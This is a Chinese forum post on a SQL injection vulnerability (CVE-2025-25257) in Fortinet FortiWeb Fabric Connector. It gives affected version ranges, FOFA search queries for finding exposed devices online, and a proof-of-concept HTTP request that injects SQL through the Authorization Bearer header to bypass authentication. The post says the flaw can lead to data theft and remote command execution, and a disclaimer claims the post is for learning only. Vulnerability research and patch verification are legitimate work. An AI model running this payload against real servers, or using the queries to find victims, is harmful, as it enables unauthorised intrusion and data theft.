Fortinet FortiWeb Fabric Connector SQL注入漏洞-网络安全论坛-网络安全-阻击者联盟

Fortinet FortiWeb Fabric Connector SQL注入漏洞

勾八徽章-资深玩家-阻击者联盟等级-LV2-阻击者联盟1个月前发布
30

免责声明

       请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述:

Fortinet FortiWeb Fabric Connector SQL注入漏洞(CVE-2025-25257),攻击者可在无需登录的情况下构造恶意请求绕过身份认证,利用SQL注入漏洞获取数据库中的敏感信息,或者造成远程命令执行,控制服务器。

影响版本:

FortiWeb 7.6,7.6.0 <= version <=7.6.3
FortiWeb 7.4,7.4.0 <= version <=7.4.7
FortiWeb 7.2,7.2.0 <= version <=7.2.10
FortiWeb 7.0,7.0.0 <= version <=7.0.10

FOFA:

app="FORTINET-FortiWeb"
body="FortiToken clock drift detected"

POC:

GET /api/fabric/device/status HTTP/1.1
Host: xxx.xxx.xxx.xxx
Authorization: Bearer AAAA'/**/or/**/'1'='1

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面